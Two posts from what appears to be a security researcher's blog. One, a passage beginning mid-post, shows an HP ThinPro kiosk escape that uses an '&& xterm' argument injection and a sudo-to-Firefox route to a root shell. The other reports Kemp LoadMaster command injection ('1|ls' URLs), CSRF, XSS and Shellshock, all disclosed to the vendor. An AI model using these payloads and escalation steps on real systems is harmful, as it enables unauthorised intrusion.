<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPlPPo9JM5sl00w-J93yoRpHFvKomRi9y78zuVotsq47lJGzlcWwuC01rN9YWXK0A2PzO_NgSgixOXZzr6giN7HeFn2MGc_SJOT7LSbiR1c_prX6mHKoFXmT4G7kcRHIkF1kWRvBxJdjE/s1600/hp-settings3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPlPPo9JM5sl00w-J93yoRpHFvKomRi9y78zuVotsq47lJGzlcWwuC01rN9YWXK0A2PzO_NgSgixOXZzr6giN7HeFn2MGc_SJOT7LSbiR1c_prX6mHKoFXmT4G7kcRHIkF1kWRvBxJdjE/s1600/hp-settings3.png" height="187" width="400" /></a></div>
<br />
I did not set the "Allow user to lock screen" to simulate a scenario where users can use any thin-clients (kiosk style). However, I have also noticed that the default password for the account "user" is "user", so if you find an environment where they enforce account lockout, you can try that password directly (it is very often unchanged...)<br />
<br />
I also set a password for the administrator's view, so when a user attempts to switch to the admin view, a password would be required.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCmMQX5BPGeoAk5Jw6ozPIBRXzN5M5sh2KPj5K150p07gBwsNPoAVx2zhPNnc40HKWVNpq5OZWtVGtz5ZejU1bUShZ07qhHsCKoC03qwyHC8cW2vb6Tfobqjyr0IdkHMUQ1NMeQ5PE7es/s1600/hp-settings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCmMQX5BPGeoAk5Jw6ozPIBRXzN5M5sh2KPj5K150p07gBwsNPoAVx2zhPNnc40HKWVNpq5OZWtVGtz5ZejU1bUShZ07qhHsCKoC03qwyHC8cW2vb6Tfobqjyr0IdkHMUQ1NMeQ5PE7es/s1600/hp-settings.png" /></a></div>
<br />
In this scenario, the standard user does not know this password and should only be able to use a single VMware Horizon View pre-configured connection, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7_Cevbtafv1dT5ixGqpyWa0YfAHu9EwDh9F9qI1tWJENgoXa7xFlm61nxvEbFU_Ydw3pWbIIOMsrj7j89j4nPkWcB2gfWPuZU4Jczy_AJW-Nz96UgosYugHvA7yzNmlpfiufc0jgF_Xw/s1600/hp-s2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7_Cevbtafv1dT5ixGqpyWa0YfAHu9EwDh9F9qI1tWJENgoXa7xFlm61nxvEbFU_Ydw3pWbIIOMsrj7j89j4nPkWcB2gfWPuZU4Jczy_AJW-Nz96UgosYugHvA7yzNmlpfiufc0jgF_Xw/s1600/hp-s2.png" /></a></div>
<br />
However, I have found out that unless there is user lockout enabled, then it is possible to get a root shell following the steps below:<br />
<br />
- Select the connection profile, and edit the profile (if it auto-starts, then you should cancel the connection)<br />
<br />
- A new window with a form is presented to you - fill the server field with dummy data and then click on the General options<br />
<br />
- Perform the attack to "escape" from the ThinPro Control Center kiosk by entering under "Command Line Arguments": && xterm<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI0Irlqnw683h2IaxJWnnkCF1ytnE43jztceOQkXqombh1NBN_0hg-HkvsTQkscLEkhokHrn7k2ULewwxKa-hqpxfxlwkv5GnucRG_B19lkRiJXOikkZ9ZixFXaS6oNXXx_vvJVJr8RtU/s1600/hp-attack2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI0Irlqnw683h2IaxJWnnkCF1ytnE43jztceOQkXqombh1NBN_0hg-HkvsTQkscLEkhokHrn7k2ULewwxKa-hqpxfxlwkv5GnucRG_B19lkRiJXOikkZ9ZixFXaS6oNXXx_vvJVJr8RtU/s1600/hp-attack2.png" /></a></div>
<br />
<br />
- Click Ok to save the new "VMware Horizon View" profile<br />
<br />
- Click on new "VMware Horizon View" profile and the connection will timeout/fail, as dummy data was entered. However, when you close/cancel the window, the xterm window will be spawn<br />
<br />
- You have bash shell access to the HP Zero client<br />
<br />
The user id is user, so no root yet.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHavF73ovPCS8XGdA2IethqgnBhKARF6ScuHDuqqrtzKIJI6sY8VP072MNv5ueB4WYgWfm8O-DFsx-jwMLf8zAaJmBvy7-Fpr8CknWueeYf7yroVl67PQDIn3Rnn69jYkdbv9kaUVpwKc/s1600/hp-attack3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHavF73ovPCS8XGdA2IethqgnBhKARF6ScuHDuqqrtzKIJI6sY8VP072MNv5ueB4WYgWfm8O-DFsx-jwMLf8zAaJmBvy7-Fpr8CknWueeYf7yroVl67PQDIn3Rnn69jYkdbv9kaUVpwKc/s1600/hp-attack3.png" /></a></div>
<br />
<br />
However, if you check sudo -ll you see that by default, the account user can perform a lot of commands as root without the need to enter a password. The output of sudo is included in this <a href="http://pastebin.com/7DNZ6iTq">pastebin</a> and an exerpt below:<br />
<br />
<i>[SNIP]</i><br />
<i><br /></i>
<i>Sudoers entry:</i><br />
<i> RunAsUsers: root</i><br />
<i> Commands:</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>NOPASSWD: /usr/bin/hpobl</i><br />
<br />
<i>[SNIP]</i><br />
<br />
<div>
The most interesting command I have found is: /usr/bin/hpobl</div>
<div>
<br /></div>
<div>
This command allows access to the HP Easy Setup Wizard panel. Through this one, it is possible to change settings. However, in this scenario, you do not know any password, so you must find a way to get a root shell from this Wizard panel.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHyU0h7HV_dzXsnVcsi3fDOR9zrV0nlGYkm0Dfp1hsuH1c-_pPzw9tWAgnq9kfRBVtMiH6imnOpz1BzoP0cS7inWTZzdN22l5I4xpPPuWw-AF5Xv5gaoElm7CSiStsFhmhhk7q9gVT6mM/s1600/hp-attack4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHyU0h7HV_dzXsnVcsi3fDOR9zrV0nlGYkm0Dfp1hsuH1c-_pPzw9tWAgnq9kfRBVtMiH6imnOpz1BzoP0cS7inWTZzdN22l5I4xpPPuWw-AF5Xv5gaoElm7CSiStsFhmhhk7q9gVT6mM/s1600/hp-attack4.png" /></a></div>
<br /></div>
<div>
By going directly to the last step "Thank you" (all the previous steps can be ignored for the lolz), then click on the link - this will spawn Firefox to load the link you just clicked.</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ6TYPZIMJyihT8Agj3FTulnl-AmWR2awhbTlV5vOQHkkkY56bEZWwKU58-P6jcd5lCoG8PLMHlN2dm4tvmORMfimonJGNkD0goqoJZxXslogPjIm_yt96fJOO2XWyG8-us9KMcOxyS8w/s1600/hp-attack5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ6TYPZIMJyihT8Agj3FTulnl-AmWR2awhbTlV5vOQHkkkY56bEZWwKU58-P6jcd5lCoG8PLMHlN2dm4tvmORMfimonJGNkD0goqoJZxXslogPjIm_yt96fJOO2XWyG8-us9KMcOxyS8w/s1600/hp-attack5.png" /></a></div>
<br /></div>
<div>
<br /></div>
<div>
At this stage, you have launched HP Easy Setup Wizard as root and Firefox process is also launched as root. One elegant option to get a shell of Firefox is to set Firefox's external mail handler - Edit / Preferences / Applications / Mailto - and point it to /usr/bin/xterm<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgizvbQwL-P6qdfCJMOajXJ7ttaJGKZMVBYx4xWgOicxKSAzNebgxxwOA07M_xCe0dmCpuJPoRoubMYW2PlyaLyNBL1h8m4V7o8IObGlO4ADExPmyQGYQ_MmvH6Sk70lfea4nGWIRrujqc/s1600/hp-attack6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgizvbQwL-P6qdfCJMOajXJ7ttaJGKZMVBYx4xWgOicxKSAzNebgxxwOA07M_xCe0dmCpuJPoRoubMYW2PlyaLyNBL1h8m4V7o8IObGlO4ADExPmyQGYQ_MmvH6Sk70lfea4nGWIRrujqc/s1600/hp-attack6.png" /></a></div>
<br />
<br />
Then you just need to point a tab to: mailto:email@address.com and you will then be gratified with a root shell:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp6b0pn19AKQEWZHhGudcbk_EaCGiMbWBIBOQsNsFRGSxt7JegaJJe9wk_nzNEJoYt30lncA0YtngO1Ge5ZzaCpd9DMrnV6i6DWNLkJf6RBHR74-PycMf1L-5qtgHdCl6VvoYW3H50Ml8/s1600/hp-attack7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp6b0pn19AKQEWZHhGudcbk_EaCGiMbWBIBOQsNsFRGSxt7JegaJJe9wk_nzNEJoYt30lncA0YtngO1Ge5ZzaCpd9DMrnV6i6DWNLkJf6RBHR74-PycMf1L-5qtgHdCl6VvoYW3H50Ml8/s1600/hp-attack7.png" height="308" width="640" /></a></div>
<br /></div>
<div>
<br /></div>
<div>
Here is a video of the entire attack which takes less than two minutes, in respect of the title of this blog post (in reality, the title was "...in less that one minute", but couldn't do it in that time frame lol...if you do it in less than one minute let me know...):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/HheAYYter_s/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/HheAYYter_s?feature=player_embedded" width="320"></iframe></div>
<br /></div>
<div>
<br /></div>
<div>
So what's the catch?<br />
<br />
If you are performing a penetration testing against a VDI, look for quick wins as this one... if you are responsible for VDI, then consider that those machines can be compromised very easily - a soft key logger will be enough to get credentials to a Windows domain... also, check what configuration is enforced on the thin-client itself. It might even be more relaxed than the one considered in this scenario.<br />
<br />
If you like kiosks and more in particular you like to break them, then you absolutely need to try: <a href="http://ikat.ha.cked.net/">http://ikat.ha.cked.net/</a> . Greetz to <a href="https://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-craig.pdf">Paul Craig</a>, the "self-proclaimed" king of kiosks! ;-)</div>
<br />
I haven't tried other HP Thin Pro images yet, but it might be possible that the attack shown in this blog also affects versions earlier than T6X44017.<br />
<br />
If you find other ways to bypass HP ThinPro OS, please let me know.
<!-- Blogger automated replacement: "https://images-blogger-opensocial.googleusercontent.com/gadgets/proxy?url=http%3A%2F%2Fproduct-images.www8-hp.com%2Fdigmedialib%2Fprodimg%2Flowres%2Fc04245042.png&container=blogger&gadget=a&rewriteMime=image%2F*" with "https://blogger.googleusercontent.com/img/proxy/AVvXsEhlWSaZWhhFJAX643DRGmoJ4sJ699d62nOH1KZIRL3UBbON1ZlSvL-D59s1g-Y1Jrg4bgIBmkcT06krf_-tQh6dsxG4WwDhET7_Rad0zOLkwniXjEtG_tY6-G8oHtSa3D7LnOp9O6y5fLkc3vZrJRPpbwM5vuvvYshLSWcZ2IqV2JR1cF3qGobIZSc=" --><!-- Blogger automated replacement: "https://blogger.googleusercontent.com/img/proxy/AVvXsEhlWSaZWhhFJAX643DRGmoJ4sJ699d62nOH1KZIRL3UBbON1ZlSvL-D59s1g-Y1Jrg4bgIBmkcT06krf_-tQh6dsxG4WwDhET7_Rad0zOLkwniXjEtG_tY6-G8oHtSa3D7LnOp9O6y5fLkc3vZrJRPpbwM5vuvvYshLSWcZ2IqV2JR1cF3qGobIZSc=" with "https://blogger.googleusercontent.com/img/proxy/AVvXsEhlWSaZWhhFJAX643DRGmoJ4sJ699d62nOH1KZIRL3UBbON1ZlSvL-D59s1g-Y1Jrg4bgIBmkcT06krf_-tQh6dsxG4WwDhET7_Rad0zOLkwniXjEtG_tY6-G8oHtSa3D7LnOp9O6y5fLkc3vZrJRPpbwM5vuvvYshLSWcZ2IqV2JR1cF3qGobIZSc=" -->Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com4tag:blogger.com,1999:blog-5593108060941425908.post-57162528904667445472015-04-01T22:30:00.000+02:002015-04-01T23:22:03.038+02:00Playing with Kemp Load Master<br />
<a href="http://kemptechnologies.com/server-load-balancing-appliances/virtual-loadbalancer/vlm-overview/">Kemp virtual load master</a> is a virtual load-balancer appliance which comes with a web administrative interface. I had a chance to test it and this blog post summarises some of the most interesting vulnerabilities I have discovered and which have not been published yet. For those of you who want to try it as well, you can get a free trial version here: <a href="http://kemptechnologies.com/server-load-balancing-appliances/virtual-loadbalancer/vlm-download">http://kemptechnologies.com/server-load-balancing-appliances/virtual-loadbalancer/vlm-download</a><br />
<br />
By default, Kemp web administrative interface is protected by Basic authentication, so the vulnerabilities discussed in the post below can either be exploited attacking an authenticated user via CSRF or XSS based attacks.<br />
<br />
The following vulnerabilities were discovered when looking at Kemp Load Master v.7.1-16 and some of them should be fixed in the latest version (7.1-20b or later).<br />
<br />
Change logs of the fixed issues can be found at the following page:<br />
<br />
"<a href="http://kemptechnologies.com/files/assets/documentation/7.1/overviews/Product_Overview-LoadMaster_Release_Notes.pdf">PD-2183 Functions have been added to sanitize input in the WUI in order to</a> <a href="http://kemptechnologies.com/files/assets/documentation/7.1/overviews/Product_Overview-LoadMaster_Release_Notes.pdf">resolve some security issues – fix for CVE-2014-5287 and CVE-2014-5288</a>".<br />
<br />
<b>Remote Code Execution</b> - status: fixed in 7.1.20b (reported in June 2014) - CVE-2014-5287/5288<br />
<br />
An interesting remote code execution vector can be found through the attack payload below:<br />
<br />
http://x.x.x.x/progs/fwaccess/add/1|command<br />
<br />
The web application functionality is based on multiple bash scripts contained in the /usr/wui/progs folder. The application is using CGI so that the scripts can handle HTTP requests.<br />
<br />
The main page "fwaccess" executes the following function:<br />
<br />
[snip] from /usr/wui/progs/fwaccess<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2UTAjjpF9NbNgUoo729KFRLiv63A8XsPEYhyphenhypheny7A93t9s04BECPt-6Ln0XGIH6CkZSAYjm8E5918UAZV5ZL74iEvZGMDYCtCvP-dZmKXT_wPTcQFCPVAP5orzNt6tWCTBomnr3VhwNhnQ/s1600/fwaccess_code1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2UTAjjpF9NbNgUoo729KFRLiv63A8XsPEYhyphenhypheny7A93t9s04BECPt-6Ln0XGIH6CkZSAYjm8E5918UAZV5ZL74iEvZGMDYCtCvP-dZmKXT_wPTcQFCPVAP5orzNt6tWCTBomnr3VhwNhnQ/s1600/fwaccess_code1.png" /></a></div>
<br />
<br />
We notice that if the result of the command on line 285 is not positive (check on 286), then seterrmsg function is called.<br />
<br />
The seterrmsg function is defined in /usr/wui/progs/util.sh and it is shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioe2GTT4bMFd2Md5DgS1q2abNmxBkC7eBP6aClNYnAu85WPv_s111M51-zUilU2_-PSn3dl207_GYrKEWCGPbUowS_SUPhsYjF8DskqsFN19f6h2xTF2rLsYh-RFT82gMhWO3Y4Vsc26k/s1600/errmsg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioe2GTT4bMFd2Md5DgS1q2abNmxBkC7eBP6aClNYnAu85WPv_s111M51-zUilU2_-PSn3dl207_GYrKEWCGPbUowS_SUPhsYjF8DskqsFN19f6h2xTF2rLsYh-RFT82gMhWO3Y4Vsc26k/s1600/errmsg.png" /></a></div>
<br />
On line 318 we see a dangerous "eval" against our parameters. By simply attempting multiple characters, the seterrmsg function is invoked and returns plenty of interesting information:<br />
<br />
http://x.x.x.x/progs/fwaccess/add/1'ls<br />
<br />
Response:<br />
<br />
<i>HTTP/1.1 200 OK</i><br />
<i>Date: Sat, 27 Dec 2014 23:25:55 GMT</i><br />
<i>Server: mini-http/1.0 (unix)</i><br />
<i>Connection: close</i><br />
<i>Content-Type: text/html</i><br />
<i>/usr/wui/progs/util.sh: eval: line 318: unexpected EOF while looking for matching `''</i><br />
<i>/usr/wui/progs/util.sh: eval: line 319: syntax error: unexpected end of file</i><br />
<br />
line 318 contains an eval against the $@ (which contains our arguments). The arguments are passed via the fwaccess page, where IFS is set with a slash "/" separator.<br />
<br />
By attempting the request below, it is possible to achieve code execution:<br />
<br />
http://x.x.x.x/progs/fwaccess/add/1|ls<br />
<br />
Response:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWA1H_Y18jfIz72Vq6mFPpw1bAc11P8fHH-n3ngAPfw79fRp2EVtG7Bl1Tk2jv1k5Pzpu0oYSp143PCqp3AOE0-Lh7iknJcCw_CoAoQGZ5kWR9gMcJDbeBmPRucmqjsg8bXlIiQ1734ZY/s1600/http_post.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWA1H_Y18jfIz72Vq6mFPpw1bAc11P8fHH-n3ngAPfw79fRp2EVtG7Bl1Tk2jv1k5Pzpu0oYSp143PCqp3AOE0-Lh7iknJcCw_CoAoQGZ5kWR9gMcJDbeBmPRucmqjsg8bXlIiQ1734ZY/s1600/http_post.png" /></a></div>
<br />
Line 120 and line 190 reports an integer expression expected error, as our argument is "1|ls" is obviously no longer an integer. However, the command execution works fine, as we are redirecting output through the pipe character and to "ls" command.<br />
<br />
The application is flawed in so many other points, also, via HTTP POST requests, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV_dtN2VEitzJPZelWOMY62km2i6II-W3zDmIRA03QGCAEbw2HWyZ7f3nUdw8znWH4v5u3IsAdafLce3xE10GsQTV22IDYYF7AQi2gmJrIv-36LTqxyjfTawRNcPTcCMztES1E1Zjk1as/s1600/http_post-rce.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV_dtN2VEitzJPZelWOMY62km2i6II-W3zDmIRA03QGCAEbw2HWyZ7f3nUdw8znWH4v5u3IsAdafLce3xE10GsQTV22IDYYF7AQi2gmJrIv-36LTqxyjfTawRNcPTcCMztES1E1Zjk1as/s1600/http_post-rce.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjywEgCeN1pmkXIEUy2vjoVLe1MSF4eH-AH4t8Jzqyn-sxXSuISyjDYpD-mjXFJ052oCQ_vm43I6sNwQQAGsSr2Gd7PgT3jPWNu6qAHZihuc67fd8sV5sg7gKmnfmofjFQ3gNqvTsLKi0o/s1600/http_post-rce-response.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjywEgCeN1pmkXIEUy2vjoVLe1MSF4eH-AH4t8Jzqyn-sxXSuISyjDYpD-mjXFJ052oCQ_vm43I6sNwQQAGsSr2Gd7PgT3jPWNu6qAHZihuc67fd8sV5sg7gKmnfmofjFQ3gNqvTsLKi0o/s1600/http_post-rce-response.png" /></a></div>
<br />
Other injection points that were found:<br />
<br />
Page: /progs/geoctrl/doadd<br />
Method: POST<br />
Parameter: fqdn<br />
<br />
Page: /progs/networks/hostname<br />
Method: POST<br />
Parameter: host<br />
<br />
Page: /progs/networks/servadd<br />
Method: POST<br />
Parameter: addr<br />
<br />
Page: /progs/useradmin/setopts<br />
Method: POST<br />
Parameter: xuser<br />
<br />
So how can we exploit all this goodness?<br />
<br />
<b>CSRF (Cross Site Request Forgery)</b> - status: not fixed - reported in June 2014<br />
<br />
We can use another vulnerability, such as CSRF - most of the pages of the administrative are vulnerable to this attack, so even though a user is authenticated via Basic authentication, the forged request will force the browser to pass the credentials within the HTTP request.<br />
<br />
Interestingly enough, there are some kind of protections against CSRF for critical functions, such as factory reset, shutdown and reset. However, they are flawed as well, as the "magic" token matches with the unix epoch timestamp, so it is predictable and can be passed within the request (see below):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1nz6ggO0RJ-3mXoqnBFfaCZ1bf4FAC52YHCkriRAS4r-xoZr2XasHNhRb1FpjyPGRHO4D49FsVtdnvZu-VzcuNgtCXjmeDXgq1GBsc56IQ-wI2l-IU1lVx-euVTDxlOuVxex053vLAAw/s1600/post-http.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1nz6ggO0RJ-3mXoqnBFfaCZ1bf4FAC52YHCkriRAS4r-xoZr2XasHNhRb1FpjyPGRHO4D49FsVtdnvZu-VzcuNgtCXjmeDXgq1GBsc56IQ-wI2l-IU1lVx-euVTDxlOuVxex053vLAAw/s1600/post-http.png" /></a></div>
<br />
<b>Reflected and Stored XSS</b> - status: partially fixed - reported on June 2014<br />
<br />
Another way to attack users is via XSS - in this case, we have plenty of options, as both reflected and stored XSS are there. For instance, a user might want to CSRF -> Store XSS -> <a href="http://beefproject.com/">BeEF</a> just to achieve persistence.<br />
<br />
Reflected XSS was found on this point:<br />
<br />
Page: /progs/useradmin/setopts<br />
Method: POST<br />
Parameter: xuser<br />
<br />
Example payload:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC6iOYekfzd0xFbiz8OUPG_6o-7fXT_3UTKl-BUB9Dy-kuLjolsHHKDv6sKjMzf0k9X3BRbKGxarPYCFeV8ehMMhxb4ympc2v__pRdklvZ1G3rtjn0liN9Zyf4fjRTB3vGeTeagul0Ot4/s1600/crop-xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC6iOYekfzd0xFbiz8OUPG_6o-7fXT_3UTKl-BUB9Dy-kuLjolsHHKDv6sKjMzf0k9X3BRbKGxarPYCFeV8ehMMhxb4ympc2v__pRdklvZ1G3rtjn0liN9Zyf4fjRTB3vGeTeagul0Ot4/s1600/crop-xss.png" /></a></div>
<br />
Stored XSS was found on the following points:<br />
<br />
Page: /progs/geoctrl/doadd<br />
Method: POST<br />
Parameter: fqdn<br />
<br />
Rendered page: /progs/geoctrl/fqdn<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxJl-67tv5MgspmRg0MXOOvNWISQ-QFpA1DB2nQDCicUefx3oxmBoamqKOevTwMmB2_ccX032ZDb4ulesbQQE-E2N3UkseUBaUJelyLihv0zG33bJSj4U-5rZTNtdpy4Y55otS3gk5w6Y/s1600/stored-xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxJl-67tv5MgspmRg0MXOOvNWISQ-QFpA1DB2nQDCicUefx3oxmBoamqKOevTwMmB2_ccX032ZDb4ulesbQQE-E2N3UkseUBaUJelyLihv0zG33bJSj4U-5rZTNtdpy4Y55otS3gk5w6Y/s1600/stored-xss.png" /></a></div>
<br />
A further injection points:<br />
<br />
Page: /progs/fwaccess/add/0<br />
Method: POST<br />
Parameter: comment<br />
<br />
Page: /progs/doconfig/setmotd<br />
Method: POST<br />
Parameter:<br />
<br />
<b>BeEF Module</b><br />
<br />
As part of this research, I have developed a BeEF module to take advantage of chaining these vulnerabilities together. It is always sweet to use a XSS as a starting point to perform code execution against an appliance.<br />
<br />
The github pull request for the module can be found <a href="https://github.com/beefproject/beef/pull/1104/files">here</a>, and below you can find a video of it in action:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/aLrZpgxV00s/0.jpg" frameborder="0" height="266" src="http://www.youtube.com/embed/aLrZpgxV00s?feature=player_embedded" width="320"></iframe></div>
<br />
<br />
For this module, I wanted to use the beef.net.forge_request() function, using a POST method, required to exploit the above RCE vector attacks. However, POST method was not usable at moment of writing this module and <a href="https://twitter.com/antisnatchor">@antisnatchor</a> was very quick to <a href="https://twitter.com/antisnatchor/status/579246846490632192">fix it</a> in this case. So if you want to try it, ensure you have the latest version of BeEF installed.<br />
<br />
<br />
<b>Extra - bonus</b><br />
<br />
<b>Denial of Service</b> - status: unknown - reported on June 2014<br />
<br />
It appears the <a href="https://www.thc.org/thc-ssl-dos/">thc-ssl-dos</a> tool can bring down the Kemp Load Master administrative interface, which is served over SSL. The same goes if a balanced service is using SSL via Kemp Load Master.<br />
<br />
<b>Shell-shock</b> - status: unknown - reported in 2015<br />
<br />
Obviously, the application is not immune from the infamous <a href="http://en.wikipedia.org/wiki/Shellshock_%28software_bug%29">shell-shock vulnerability</a>. This was found by my friend <a href="http://pheneghan.blogspot.co.uk/">Paul Heneghan</a> and then by a user complaining on the vendor's blog (the comment has been removed shortly after).<br />
<br />
For those of you who are more curios, the shell-shock vulnerability works perfectly via the User-Agent header, also in version 7.1-18 and possibly on version 7.1-20 as well.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWR82uYSPvBfdMJAleA9-vMwWMh113R_zzBBXKImNkMZQxFx20bfcLLPY9nowVw3qc0TgjsfuHYQ2VInQK0-2JU8KoAfN9dvlFxa4VJaxGwVIqOZR8oL7g8jyqHSHrWqjLhOPJZpAoA5c/s1600/shell-shock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWR82uYSPvBfdMJAleA9-vMwWMh113R_zzBBXKImNkMZQxFx20bfcLLPY9nowVw3qc0TgjsfuHYQ2VInQK0-2JU8KoAfN9dvlFxa4VJaxGwVIqOZR8oL7g8jyqHSHrWqjLhOPJZpAoA5c/s1600/shell-shock.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg77uxqJOSw4RLe2xN-vxBmYvXybarlyiEN_Mwy5L6iVfvkVppweEGldvP6TqMaPJjpshX-5_IeVqnxEPDkboFiWO9uefpkv5UtJKChxGhQbWzhKJSmI905cvgyOsgYCoNTk_HFEqh7liw/s1600/shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg77uxqJOSw4RLe2xN-vxBmYvXybarlyiEN_Mwy5L6iVfvkVppweEGldvP6TqMaPJjpshX-5_IeVqnxEPDkboFiWO9uefpkv5UtJKChxGhQbWzhKJSmI905cvgyOsgYCoNTk_HFEqh7liw/s1600/shell.png" /></a></div>
<br />
Funny enough, Kemp provides Web Application Firewall protection, but I wonder how they can "prevent" the OWASP Top Ten (as they claim <a href="http://kemptechnologies.com/solutions/waf/">here</a>), if their main product is affected by so many critical vulnerabilities ;-)<br />
<br />
If you are keen for an extra-extra bonus, keep reading...<br />
<br />
<b>Extra - extra bonus:</b><br />
<br />
<b>No license, no web authentication</b><br />
<br />
If you manage to invalidate your license, you will be prompted to a page such as the one below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlMIx3Tr88H6mDr5ZMxs4j9OevfHuwhb-Ca4ZuJiBs3znFiPkz8iQewUyXAyyLY1v9oqut3moA00dD1qo86blb1JNh5wK44uH0js6o6EYxLRp5mc8HijhfpOyBn5z-sDlzjoP1vAKcOUU/s1600/invalid-license.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlMIx3Tr88H6mDr5ZMxs4j9OevfHuwhb-Ca4ZuJiBs3znFiPkz8iQewUyXAyyLY1v9oqut3moA00dD1qo86blb1JNh5wK44uH0js6o6EYxLRp5mc8HijhfpOyBn5z-sDlzjoP1vAKcOUU/s1600/invalid-license.png" height="156" width="400" /></a></div>
<br />
<br />
However, most of the underlying functionality is still available and "attackable" without need of basic authentication. You can invalidate the license with a CSRF setting time far in the future ;-)<br />
<br />
